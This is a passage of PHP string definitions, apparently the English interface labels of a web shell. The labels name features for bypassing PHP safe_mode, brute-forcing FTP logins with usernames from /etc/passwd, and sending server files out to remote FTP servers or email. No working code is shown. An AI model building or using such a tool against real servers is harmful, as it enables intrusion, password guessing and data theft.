'eng_text67'=>'chown/chgrp/chmod',
'eng_text68'=>'command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"second commands param is:\r\n- for chown - name of new owner or
uid\r\n- for chgrp - group name or gid\r\n- for chmod - 0777, 0755...",
'eng_text72'=>'text for find',
'eng_text73'=>'find in folder',
'eng_text74'=>'find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'search text in files via find',
'eng_text80'=>'type',
'eng_text81'=>'net',
'eng_text82'=>'databases',
'eng_text83'=>'run sql query',
'eng_text84'=>'sql query',
'eng_text85'=>'test bypass safe_mode with commands execute via mssql server',
'eng_text86'=>'download files from server',
'eng_butt14'=>'download',
'eng_text87'=>'download files from remote ftp-server',
'eng_text88'=>'ftp-server:port',
'eng_text89'=>'file on ftp',
'eng_text90'=>'transfer mode',
'eng_text91'=>'archivation',
'eng_text92'=>'without archivation',
'eng_text93'=>'ftp',
'eng_text94'=>'ftp-bruteforce',
'eng_text95'=>'users list',
'eng_text96'=>'can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
'eng_text100'=>'send file to remote ftp server',
'eng_text101'=>'use reverse (user -> resu) login for password',
'eng_text102'=>'mail',
'eng_text103'=>'send email',
'eng_text104'=>'send file to email',
'eng_text105'=>'to',
'eng_text106'=>'from',
'eng_text107'=>'subj',
'eng_butt15'=>'send',
'eng_text108'=>'mail',
'eng_text109'=>'hide',
'eng_text110'=>'show',
'eng_text111'=>'sql-server : port',
'eng_text112'=>'test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'test bypass safe_mode, view file contest via imap_body',
'eng_text115'=>'test bypass safe_mode, copy file via compress.zlib:// in function
copy()',
'eng_text116'=>'copy from',
'eng_text117'=>'to',
'eng_text118'=>'file copied',
'eng_text119'=>'cant copy file',
'eng_err0'=>'error! can\'t write in file ',
'eng_err1'=>'error! can\'t read file ',
'eng_err2'=>'error! can\'t create ',
'eng_err3'=>'error! can\'t connect to ftp',
'eng_err4'=>'error! can\'t login on ftp server',